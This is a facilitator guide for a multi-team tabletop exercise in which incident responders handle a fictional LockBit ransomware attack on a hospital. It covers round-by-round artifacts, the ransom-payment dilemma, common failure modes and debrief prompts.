Large Group Facilitator Guide: LockBit – Hospital Emergency

Large Group Facilitator Guide: LockBit – Hospital Emergency

Tip

Quick Reference

• Format: Multi-Team Coordination
• Session length: 120 min + 25 min debrief
• Teams: Alpha (Forensics) / Bravo (Network/Infrastructure) / Charlie (Business Impact)
• Variants: US: Cedar Valley Medical Center / DK: Øresund Universitetshospital
• Expertise level: Beginner to intermediate (recommended as the reference scenario for first large group sessions)
• Central dilemma: Pay the $1.2M ransom to meet the 72-hour deadline, or begin manual recovery knowing the attacker is still in the domain – and PHI has already been exfiltrated
• For format selection, IC briefing, and general facilitation mechanics, see the Large Group Facilitation Guide.

21 Artifacts at a Glance

No red herring in this scenario. LockBit is the reference scenario for the Multi-Team Coordination format – it is designed to run cleanly so IMs can focus on facilitation mechanics rather than deception tracking.

Tier	Team	Card	Key Content
R1	Alpha	Initial Indicator 1: Phishing Email and Execution Chain	clinician.a phishing click; base64 PowerShell; C2 in 4 seconds; lateral movement to CLIN-WS-201 and ADMIN-WS-009
R1	Alpha	Initial Indicator 2: Coordinated Ransomware Detonation	33 hosts in 90 seconds; shadow copy deletion before encryption; EDR console offline at 18:48 UTC; GPO distribution from compromised DC
R1	Bravo	Initial Indicator 1: C2 Outbound Beaconing	45 outbound connections over 21 days; 1.2MB inbound at 18:16 UTC; domain registered 17 days before phishing
R1	Bravo	Initial Indicator 2: Internal Lateral Movement Traffic	Clinical workstation opened SMB to admin subnet; DC pushed to 27 hosts at 18:38 UTC; medical device subnet same inter-VLAN routing
R1	Charlie	Initial Indicator 1: Clinical Operations Halt Report	2 surgeries without PACS; pharmacy backlog 14 orders; ambulance diversion decision by 19:15 UTC
R1	Charlie	Initial Indicator 2: Ransom Demand and Data Proof	$1.2M demand; 72-hour deadline; PHI exfiltration confirmed; backup systems described as “gone”
R2-3	Alpha	Deep Analysis 1: Lateral Movement Timeline	it.admin.b credentials stolen from clinician.a workstation; domain admin in 13 minutes; GPO “CVMC_Update_Policy” still active
R2-3	Alpha	Deep Analysis 2: Ransomware Binary Profile	Skips .exe/.dll; RSA-2048; self-deletes after completion; 29 services terminated before encryption; C2 callback on completion
R2-3	Alpha	Deep Analysis 3: Dwell Time Reconstruction	Breach February 14; 3 exfiltration events post-midnight weekdays; payload staged March 5; backup server accessed twice
R2-3	Bravo	Deep Analysis 1: Pre-Encryption Data Exfiltration	DLP alerts suppressed via it.admin.b exception; 3 targeted file shares (PatientRecords, Billing, StaffRecords); all after midnight
R2-3	Bravo	Deep Analysis 2: Backup System Network Position	Backup server in admin subnet for “simplified install”; encrypted 2 minutes before ransomware; tape backup 14 days old and offsite
R2-3	Bravo	Deep Analysis 3: Medical Device Network Exposure	LockBit cannot spread from encrypted hosts; 19 devices on medical subnet with no patch path; unencrypted hosts may have active C2
R2-3	Charlie	Deep Analysis 1: Business Continuity and Financial Exposure	Ransom $1.2M exceeds insurance sub-limit; recovery estimated $3.2M / 18 days; revenue cycle halted; OCR 60-day clock running
R2-3	Charlie	Deep Analysis 2: Regulatory Notification Requirements	State health dept 72-hour window; insurer notification due tomorrow; breach date February 14 not March 6; 12,000–18,000 patients
R2-3	Charlie	Deep Analysis 3: Ransom Payment Decision Framework	40% decryptor failure rate; OFAC sanctions review required; domain rebuild required regardless of payment
R4-5	Alpha	Development 1: Evidence Preservation Status	CVMC-DC-01 not rebooted (critical); NetFlow retention window closes Thursday; CLIN-WS-114 memory captured with chain-of-custody
R4-5	Alpha	Development 2: Threat Actor Attribution Context	FBI active investigation of affiliate; prior non-payment recovery: 22 days; prior payment recovery: full recovery achieved
R4-5	Bravo	Development 1: Network Recovery Options	3 options (A: immediate rebuild; B: payment then rebuild; C: dual-track ED/ICU priority); all require new domain
R4-5	Bravo	Development 2: Ambulance Network Exposure	Gateway intact but ED cannot receive data; diversion active since 19:18 UTC; Riverside General and Valley Medical at near-capacity
R4-5	Charlie	Development 1: Media and Public Exposure Risk	LockBit publishes in 24–48 hours; 3 staff social media posts already; 45 ED patients saw ransom screens
R4-5	Charlie	Development 2: Minimum Viable Restoration Plan	Tape retrieval critical path for Phase 2; paper downtime ceiling ~23:00–01:00 UTC; Phase 2 metric: nurse verifies medication allergy

Opening Delivery

This is Group A “Crisis Curve” – LockBit has already detonated. The attack is over; the crisis is managing consequences. The drama is paralysis: 33 hosts are encrypted, the attacker is still in the domain, and the ransom clock is running.

LockBit is the reference scenario for this format. Run it first when a group is new to Multi-Team Coordination. The structure is clean, the dilemma is clear, and there are no red herrings to track.

Brief the IC before session open: your job is to synthesize across teams, not to be the loudest voice. You will hear three briefings and need to connect them before making any recommendation to leadership.

“It is 18:52 UTC. Cedar Valley Medical Center’s EDR just showed 33 hosts encrypted in 90 seconds. The ransom note is on every screen. The attacker claims backup systems are gone and PHI has been exfiltrated. You are the incident response team. Turn over your cards.”

“It is 18:52 UTC. Øresund Universitetshospital’s EDR just showed 33 hosts encrypted in 90 seconds. The ransom note is on every screen. The attacker claims backup systems are gone and patient data has been exfiltrated. You are the incident response team. Turn over your cards.”

Critical note: Teams will ask “should we pay?” in Round 1. That is correct. Do not answer it. The payment decision requires technical, regulatory, and financial inputs from all three teams – none of which are available yet. If an IC tries to make the payment decision in Round 1, ask: “What does Alpha know about whether you can decrypt without the attacker? What does Charlie know about the insurance sub-limit?”

Round-by-Round Facilitation Notes

Round 1 – Initial Indicators

Released: All 6 R1 cards at session open

Alpha discovers: Phishing entry via clinician.a; domain admin compromise before detonation; 33 hosts in 90 seconds via GPO from compromised DC

Bravo discovers: 21 days of beaconing that was invisible; lateral movement from clinical workstation to admin subnet; medical device subnet on same inter-VLAN routing

Charlie discovers: Clinical operations in immediate patient safety territory; $1.2M ransom with 72-hour deadline; PHI exfiltration confirmed; backup systems status unknown

IC synthesis: Bravo knows the attacker is still in the domain. Alpha knows how they got there. Charlie knows the clinical and financial stakes. The IC cannot make any recommendation without inputs from all three.

IM navigation prompt: “Ask Bravo: is the attacker still active in the network right now? Ask Alpha: what does the detonation method tell you about what the attacker can still control? Ask Charlie: what does the board need before they can vote on anything?”

End-of-round check: Has the IC noted that the ransom payment decision cannot be made yet? Has anyone checked whether the backup systems are actually gone?

Timing: 20–25 min

Round 2 – Deep Analysis, First Pass

Released: 3 cards per team at start of Round 2

Alpha discovers: it.admin.b credentials stolen from a clinical workstation (not an IT workstation); domain admin in 13 minutes from phishing click; dwell time began February 14 – not tonight

Bravo discovers: PHI exfiltration through DLP-suppressed exception for it.admin.b; backup server was in the admin subnet (encrypted 2 minutes before ransomware); 14-day-old tape offsite and unaffected

Charlie discovers: $1.2M ransom exceeds insurance sub-limit; recovery cost estimate $3.2M / 18 days; the breach date for notification purposes is February 14, not March 6

IC synthesis: The tape backup exists and is unaffected. That changes the recovery calculation. Charlie has the cost comparison ($1.2M ransom vs. $3.2M recovery) but it misses the 40% decryptor failure rate that arrives in Round 3.

IM navigation prompt: “Ask Bravo: does an offsite tape backup change the recovery options? Ask Alpha: when did the attacker get domain admin – and are they still there now?”

Note: Teams often treat the $1.2M vs. $3.2M comparison as the payment decision answer. It is not – the 40% decryptor failure rate and domain rebuild requirement arrive in Round 3 and change the calculus. If Charlie presents payment as clearly correct in Round 2, prompt: “Is that comparison complete? What does Alpha know about whether decryption actually works?”

Timing: 25 min

Round 3 – Deep Analysis, Second Pass

No new artifacts – teams continue with R2-3 material.

Alpha: Full dwell timeline; backup server access pattern; attacker knew the backup schedule. Bravo: Medical device subnet risk assessment; DLP exception analysis. Charlie: OFAC review requirement before any Bitcoin transfer; regulatory notification multi-window analysis.

IC synthesis: The payment decision now has all its components: ransom $1.2M (exceeds insurance sub-limit), 40% decryptor failure rate, domain rebuild required regardless, OFAC review required. Is payment ever the faster path to clinical restoration?

IM navigation prompt: “Charlie has the payment framework. Bravo has the recovery options. Ask the IC: does paying the ransom change the recovery timeline, or does the domain rebuild make it equivalent?”

Timing: 20–25 min

Round 4 – Developments

Released: 2 cards per team at start of Round 4

Alpha: CVMC-DC-01 not rebooted – forensic gold; NetFlow closes Thursday; FBI active investigation with decryptor analysis available

Bravo: 3 recovery options (all require new domain); dual-track Option C gets ED/ICU in 6 hours; tape retrieval status

Charlie: LockBit publishes in 24–48 hours; paper downtime ceiling approaching; Phase 2 metric defined

IC synthesis: What is the recommendation to the board – pay or rebuild? What is the minimum viable restoration timeline that keeps patients safe?

Timing: 20–25 min

Round 5 – Board Briefing (Optional at 180 Min)

Alpha: Evidence preservation closing window; FBI cooperation. Bravo: Chosen recovery option execution; tape ETA. Charlie: Holding statement approval; media response protocol; patient notification scope.

The Central Dilemma

Pay the $1.2M ransom to meet the 72-hour deadline, or begin manual recovery knowing the attacker is still in the domain – and PHI has already been exfiltrated regardless.

LockBit’s dilemma is a board-level decision framed as a technical question. The board cannot vote until they have:

• The decryptor reliability rate (Alpha – 40% failure rate from prior cases)
• The domain rebuild requirement (Bravo – required regardless of payment)
• The insurance sub-limit gap (Charlie – $1.2M exceeds sub-limit)
• The OFAC review timeline (Charlie – required before any Bitcoin transfer)
• The tape backup status (Bravo – offsite, 14 days old, unaffected)

Teams that attempt to answer the payment question before Round 3 are working with incomplete inputs. The IC’s job is to hold the decision until all four inputs are on the table.

The central insight: paying the ransom does not remove the attacker from the domain. A new Active Directory build is required regardless. That single fact changes the cost-benefit analysis entirely. If payment adds only marginal speed to clinical restoration while leaving the same forensic and rebuild work, when would payment ever be the right choice?

Information Asymmetry Map

Alpha knows	Bravo knows	Charlie knows	IC must synthesize
Domain admin obtained in 13 minutes; attacker used compromised DC for GPO; attacker is still in the domain	Backup server was in admin subnet and is encrypted; 14-day tape is offsite and intact	$1.2M ransom exceeds insurance sub-limit; recovery estimated $3.2M / 18 days	Payment leaves attacker in domain; tape backup changes recovery math; insurance gap means board needs different approval authority
Breach date is February 14; 3 structured exfiltration events; attacker accessed backup server twice and knew its schedule	DLP exception for it.admin.b suppressed all exfiltration alerts for 3 weeks	Data breach notification scope: February 14 start date, 12,000–18,000 patients	Exfiltration scope (Alpha) + breach date (Charlie) + patient count (Charlie) = notification obligation picture
40% decryptor failure rate from prior cases; domain rebuild required regardless of payment	All 3 recovery options require a new domain; dual-track Option C gets ED/ICU online in 6 hours	OFAC sanctions review required before any Bitcoin transfer	Rebuild required whether or not ransom is paid (Bravo) + 40% failure rate (Alpha) + OFAC timeline (Charlie) = complete payment decision inputs

Common Failure Modes

1. IC makes payment decision before Round 3 inputs are available

What it looks like: The $1.2M vs. $3.2M comparison lands in Round 2 and the IC recommends payment without the decryptor failure rate or domain rebuild requirement.

IM response: “Is that comparison complete? What does Alpha know about whether decryption actually works on LockBit-encrypted files – and does payment eliminate the attacker from the domain?”

2. Teams assume backup systems are gone

What it looks like: Charlie’s Round 1 card says the attacker claims backup systems are “gone.” Teams treat this as confirmed and don’t check Bravo’s backup status.

IM response: “The ransom note says backups are gone. Has Bravo checked? What specifically is encrypted and what is offsite?”

3. Medical device subnet treated as active threat

What it looks like: Bravo spends Round 2-3 on medical device exposure as if LockBit is still spreading to those devices.

IM response: “LockBit cannot spread from encrypted hosts. What is the actual current risk to the medical device subnet – and which hosts might still have an active C2 connection?”

4. Notification date treated as tonight

What it looks like: Charlie calculates the notification scope using March 6 (ransomware detonation) as the breach date instead of February 14 (initial compromise).

IM response: “When did the attacker first access PHI? Is that the detonation date or earlier – and does that change when the notification clock started?”

5. CVMC-DC-01 rebooted before evidence preserved

What it looks like: Bravo or Alpha initiates recovery actions that include rebooting the domain controller before Alpha’s Development 1 card has been briefed.

IM response: “Before that action: what is CVMC-DC-01’s current state, and what forensic evidence exists only while it remains powered on?”

6. Paper downtime ceiling not connected to recovery timeline

What it looks like: Teams reach Round 4 without anyone connecting the paper downtime ceiling (~23:00–01:00 UTC) to the Phase 2 recovery metric.

IM response: “Paper downtime has a ceiling. Recovery Phase 2 has a start time. Do those two numbers fit – and what happens if they don’t?”

Discussion Prompts by Tier and Team

Initial Indicators – Round 1

ALPHA – Initial Indicator 1: Phishing Email and Execution Chain

• Why does the sender IP, Reply-To domain, and From address all differ? What does that pattern indicate?
• The PowerShell command is encoded in base64 and runs hidden. What is that designed to prevent?
• clinician.a is clinical staff, not IT. What does that tell you about how the attacker chose their target?
• The C2 connection happened within 4 seconds of document open – before any user interaction beyond clicking the file. What does that mean?
• CLIN-WS-201 and ADMIN-WS-009 appear in the lateral activity log. What should you check on those hosts immediately?

ALPHA – Initial Indicator 2: Coordinated Ransomware Detonation

• Shadow copy deletion happened before encryption on every host. What does that sequence tell you about the attacker’s planning?
• All 33 hosts detonated within 90 seconds. How would a human operator manage that, and is there another explanation?
• The EDR console went offline at 18:48. What does that mean for evidence you need to collect right now?
• The first six hosts listed – CLIN-FS-001, ADMIN-FS-003, CLIN-WS-114, CLIN-WS-201, ADMIN-WS-009 – appear to have been the initial set. What do those hosts have in common?
• What central system would have been needed to push this to 33 hosts simultaneously?

BRAVO – Initial Indicator 1: C2 Outbound Beaconing

• 45 outbound connections over 21 days went undetected. What firewall rule or detection logic would have caught this?
• The 1.2MB inbound at 18:16 UTC is very different from the 0.4KB beacons. What changed, and what does that timing mean?
• The domain was registered 17 days before the phishing email. What does that preparation timeline tell you about how this operation was planned?
• Are there other hosts on the network that might have similar outbound beacon patterns to this IP, or other unknown destinations?
• The beaconing ran at exact 6-hour intervals for 20 days. What would make that pattern visible in retrospect?

BRAVO – Initial Indicator 2: Internal Lateral Movement Traffic

• A clinical workstation has no legitimate reason to open SMB connections to ADMIN-WS-009 in the admin subnet. Why did that connection succeed?
• The domain controller pushed to 27 hosts at 18:38. What level of domain access would enable that, and when was it likely obtained?
• The medical device subnet (192.168.30.0/24) has the same inter-VLAN routing as the compromised subnets. What does that mean right now?
• How many of the 27 hosts that received the GPO are confirmed encrypted, and how many might still be reachable?
• What single network action, taken immediately, would be most effective at limiting further spread?

CHARLIE – Initial Indicator 1: Clinical Operations Halt Report

• Two surgical procedures are underway without PACS imaging access. What is the immediate patient safety priority?
• Paper downtime is sustainable for 4-6 hours. Technical recovery will take longer than that. What needs to happen to manage that gap?
• The pharmacy backlog is 14 orders and growing. What clinical decisions depend on pharmacy throughput?
• Ambulance diversion has not been activated. What information would your team need before recommending it to the CMO by 19:15 UTC?
• Which clinical system, if partially restored first, would have the highest immediate patient safety impact?

CHARLIE – Initial Indicator 2: Ransom Demand and Data Proof

• The message says backup systems are “gone.” What do you need to check, and how quickly?
• PHI exfiltration is confirmed by the proof files. What legal obligations does that trigger, and when do they start?
• The ransom deadline is 72 hours from now. How does that timeline interact with your investigation and recovery timelines?
• The instruction to not contact law enforcement – what is your team’s position on that?
• What is the minimum factual picture leadership needs before they can make any decision about the ransom demand?

Deep Analysis – Rounds 2-3

ALPHA – Deep Analysis 1: Lateral Movement Timeline

• it.admin.b’s credentials were stolen from clinician.a’s workstation. Why would an IT admin’s credentials be accessible in a clinician’s machine memory?
• The attacker had domain admin access 13 minutes after the phishing click. At that point, what on the network was NOT at risk?
• The GPO “CVMC_Update_Policy” was created at 18:31. Is it still active and pushing to any systems?
• CVMC-DC-01 was accessed with stolen credentials. What is its current state, and what does that mean for recovery?
• The attack moved from phishing to domain admin in 13 minutes. Which step in this chain could have been interrupted, and how?

ALPHA – Deep Analysis 2: Ransomware Binary Profile

• The binary skips .exe and .dll files. What does that tell you about the attacker’s intention – destruction vs. extortion?
• Files are encrypted with RSA-2048. What does that mean practically for any attempt to decrypt without paying?
• The binary self-deletes after completing. What does that mean for forensic evidence on the affected hosts?
• 29 services including backup and database services were terminated before encryption. Which of those services matter most for your recovery path?
• The C2 callback on completion tells the attacker how many files were encrypted. What might the attacker do with that confirmation?

ALPHA – Deep Analysis 3: Dwell Time Reconstruction

• The breach started February 14 – not tonight. What does that mean for the scope of what was accessed?
• Three separate exfiltration events happened after midnight on weekdays. What detection capability would catch that pattern?
• The attacker accessed the backup server twice and noted its schedule. Why would that matter to them?
• The payload was staged March 5 but not detonated until March 6. What might the attacker have been waiting for?
• How far back do you need to look in logs to understand the full scope of this incident?

BRAVO – Deep Analysis 1: Pre-Encryption Data Exfiltration

• The DLP alerts were suppressed because it.admin.b has an exception. What was the reasoning behind that exception, and is it still justified?
• Three sessions targeted three different file shares – PatientRecords, Billing, StaffRecords. What does the structured targeting suggest?
• All three events happened after midnight on weekdays. What monitoring would have detected that pattern regardless of the account exception?
• The exfiltration happened through CLIN-WS-114 using it.admin.b credentials. At the time, where was it.admin.b actually logged in?
• The DLP exception for it.admin.b prevented detection for three weeks. What changes to that policy would you recommend?

BRAVO – Deep Analysis 2: Backup System Network Position

• The backup server was placed in the admin subnet to “simplify backup agent installation.” What is the security consequence of that decision?
• The attacker encrypted the backup two minutes before detonating the ransomware. What does that sequencing tell you about their planning?
• The last tape backup is 14 days old. What does a 14-day data gap mean specifically for Cedar Valley’s clinical records?
• The backup server used domain admin credentials for authentication. What alternative authentication design would have isolated it?
• The tape is offsite and currently unaffected. What is the fastest path to beginning a restoration from it?

BRAVO – Deep Analysis 3: Medical Device Network Exposure

• LockBit cannot spread from encrypted hosts. What is the actual current risk to the medical device subnet?
• Which unencrypted hosts might still have an active C2 connection, and how would you check?
• The 19 devices on the medical device subnet have no patch path. What network-level controls substitute for host-level patching?
• Which medical devices, if disrupted, would have direct patient safety consequences right now?
• What is the fastest action that would reduce risk to the medical device subnet without disrupting patient care?

CHARLIE – Deep Analysis 1: Business Continuity and Financial Exposure

• The ransom demand exceeds the insurance sub-limit. Who needs to be in the room to authorize any payment decision?
• The recovery cost estimate ($3.2M, 18 days) exceeds the ransom ($1.2M). Does that financial comparison resolve the payment question, or are there other factors?
• Revenue cycle is completely halted. How long can the hospital sustain zero billing income before operational decisions change?
• What information does the board need before they can vote on any payment option?

• The 60-day OCR notification clock is running. What internal process needs to start tonight to meet that deadline?

• The Datatilsynet notification clock is running – 72 hours from discovery. What internal process needs to start tonight to meet that deadline?

CHARLIE – Deep Analysis 2: Regulatory Notification Requirements

• The state health department 72-hour window closes Thursday evening. What does a preliminary notification look like, and who authorizes it?
• The insurer notification is “due by tomorrow.” What does a missed insurer notification mean for the $2M coverage?
• Law enforcement contact is explicitly threatened by the attacker. What is the practical consequence of reporting to the FBI vs. not reporting?

• The Datatilsynet 72-hour window closes Thursday evening. What does a preliminary notification look like, and who authorizes it?
• The insurer notification is “due by tomorrow.” What does a missed insurer notification mean for the coverage?
• Law enforcement contact is explicitly threatened by the attacker. What is the practical consequence of reporting to CFCS and politiet vs. not reporting?

• The patient count estimate is 12,000–18,000. That triggers media notification as well as patient notification. Who manages external communications?
• The breach date is February 14, not March 6. How does that change the notification scope?

CHARLIE – Deep Analysis 3: Ransom Payment Decision Framework

• What specific technical facts does your team need to provide to the board before they vote?
• A 40% decryptor failure rate means some systems may need to be restored from backup even if payment is made. How does that change the cost-benefit analysis?
• OFAC sanctions risk means legal review is required before any Bitcoin transfer. How long does that take, and does that timeline fit within the 72-hour window?
• If the board decides not to pay, what does the recovery timeline look like, and what patient care decisions depend on it?
• Payment does not remove the attacker from the network – the domain is still compromised regardless. What does that mean for the sequencing of any response?

Developments – Rounds 4-5

ALPHA – Development 1: Evidence Preservation Status

• CVMC-DC-01 has not been rebooted. What specifically do you need to extract from it before any recovery action touches that machine?
• The NetFlow retention window closes Thursday. Who on your team is responsible for exporting those logs?
• CLIN-WS-114 memory has been captured and has chain-of-custody. Who needs to be notified that this evidence exists?
• The Windows event logs on 14 clinical workstations are encrypted and inaccessible. What does that mean for reconstructing the attacker’s activity on those machines?
• What is the priority order for forensic tasks in the next four hours, and who owns each one?

ALPHA – Development 2: Threat Actor Attribution Context

• The FBI has an active investigation of this affiliate. What does Cedar Valley’s cooperation mean for that investigation?
• Prior non-payment recovery took 22 days. How does that timeline compare to Cedar Valley’s current recovery options?
• The February 2026 case paid and achieved full recovery. How does that information factor into the board’s decision?
• The FBI can provide decryptor analysis and recovery assistance. What specifically should Cedar Valley request?

• CFCS has an active investigation of this affiliate. What does Øresund’s cooperation mean for that investigation?
• Prior non-payment recovery took 22 days. How does that timeline compare to Øresund’s current recovery options?
• The February 2026 case paid and achieved full recovery. How does that information factor into the board’s decision?
• CFCS can provide decryptor analysis and recovery assistance. What specifically should Øresund request?

• Is there information in this threat intelligence that should change any decisions already made or planned tonight?

BRAVO – Development 1: Network Recovery Options

• All options require a new domain. What does that mean for the timeline and who can execute a new AD build at this hour?
• Option C gets ED and ICU online in 6 hours but requires dual-track execution. Does your team have the capacity?
• The tape is 40 miles away. Who is authorizing retrieval, and is it already in transit?
• Under Option B (payment), the domain still needs to be rebuilt. What does “payment buys us time” actually mean in that context?
• Which option does your team recommend, and what does the recommendation depend on?

BRAVO – Development 2: Ambulance Network Exposure

• The gateway is intact, but the ED can’t receive data. Is a single-workstation restore for ambulance data reception worth prioritizing alongside the full recovery?
• Verbal pre-arrival handoffs have been running for 3 hours with no adverse events. How long is that sustainable, and what changes that assessment?
• Diversion has been active since 19:18. When will it be safe to lift, and what system restoration does that decision depend on?
• Riverside General and Valley Medical have 22 beds between them for diverted emergency patients. What happens if their capacity fills?
• Who at Cedar Valley is coordinating with the county EMS and the receiving hospitals?

CHARLIE – Development 1: Media and Public Exposure Risk

• The communications window is 24–48 hours before LockBit publishes. Has a holding statement been drafted and who approved it?
• Three staff members posted on social media already. Is there a staff communications protocol that should go out tonight?
• The 45 ED patients who saw ransom screens are potential sources for media. Is there a patient communications plan?
• Confirming PHI theft publicly triggers notification obligations. At what point does the organization have to confirm it?
• Who is the single spokesperson, and do they have legal briefing for media questions?

CHARLIE – Development 2: Minimum Viable Restoration Plan

• The tape retrieval is the critical path for Phase 2. Has it been authorized, and what is the current ETA?
• Paper downtime ceiling is approximately 23:00–01:00 UTC. If Phase 2 doesn’t start until 04:00, what does that gap mean for patient care?
• The Phase 2 metric is “can a nurse verify a medication allergy.” Is that the right metric, or is there a more critical clinical function?
• Revenue cycle is explicitly deprioritized. Who has communicated that decision to the finance team, and what are the downstream consequences?
• Is there a single person who owns the Phase 2 timeline and has authority to make sequencing decisions without escalating?

Debrief Focus

1. “The payment decision required inputs from all three teams. When did those inputs actually come together – and how many rounds did the IC operate without a complete picture?”

Surfaces: the IC synthesis function; how information silos delay high-stakes decisions.

2. “The attacker was in the network for 20 days before detonation. Three exfiltration events happened after midnight on weekdays. What would have caught this earlier – and is that control feasible for a hospital network?”

Surfaces: dwell time as a structural detection problem; the limits of perimeter-focused security.

3. “All three recovery options require rebuilding the domain. Does paying the ransom change the recovery timeline at all – and if not, when is ransom payment ever the faster path to clinical restoration?”

Surfaces: the rebuild-regardless insight; what ransom payment actually buys (and doesn’t).

4. “PHI was exfiltrated on February 14, 21 days before detonation. The notification scope is 12,000–18,000 patients. What does that 21-day gap mean for how quickly the HIPAA notification clock started – and did the organization know?”

Surfaces: discovery vs. breach date in HIPAA notification; the regulatory consequence of dwell time.

4. “Patient data was exfiltrated on February 14, 21 days before detonation. The notification scope is 12,000–18,000 affected individuals. Under GDPR, the 72-hour clock to Datatilsynet runs from when the breach is identified – not when it occurred. When did Øresund actually identify it – and what does that mean for their notification obligation?”

Surfaces: GDPR’s discovery-based notification clock; the regulatory consequence of dwell time.

5. “No patients were harmed during the 3-hour paper downtime period. What specifically held during that window – and which of those safeguards was procedure versus luck?”

Surfaces: the gap between paper downtime design and actual clinical resilience under pressure.